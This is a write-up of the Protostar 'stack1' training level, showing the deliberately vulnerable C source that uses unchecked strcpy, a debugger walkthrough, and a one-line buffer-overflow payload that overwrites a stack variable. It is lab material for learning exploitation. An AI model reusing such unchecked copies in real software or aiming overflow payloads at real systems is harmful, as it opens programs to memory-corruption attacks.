stack1
TL;DR -> `./stack1 $(python -c "print 'A'*64 + '\x64\x63\x62\x61'")`Stack1
URL: https://exploit.education/protostar/stack-one/ This level looks at the concept of modifying variables to specific values in the program, and how the variables are laid out in memory.
This level is at /opt/protostar/bin/stack1
Hints
If you are unfamiliar with the hexadecimal being displayed, “man ascii” is your friend. Protostar is little endian
Source code
#include <stdlib.h>
#include <unistd.h>
#include <stdio.h>
#include <string.h>
int main(int argc, char **argv)
{
volatile int modified;
char buffer[64];
if(argc == 1) {
errx(1, "please specify an argument\n");
}
modified = 0;
strcpy(buffer, argv[1]);
if(modified == 0x61626364) {
printf("you have correctly got the variable to the right value\n");
} else {
printf("Try again, you got 0x%08x\n", modified);
}
}Writeup
In stack1 we have to pass the argument while running th binary and it will check for the address. In short, we have to overflow the buffer and add the last address that is been compared.
Here, we have set the break point before compare execution and checked the stack using x/24x $esp and from that we can see that, we have reached the last byte of buffer, now we just have to append the address in the stack. Therefore adding \x64\x63\x62\x61 will add the address in the last byte and that will be compared with the modified value.
Payload: python -c "print 'A'*64 + '\x64\x63\x62\x61'"
One liner solution: ./stack1 $(python -c "print 'A'*64 + '\x64\x63\x62\x61'")
Last updated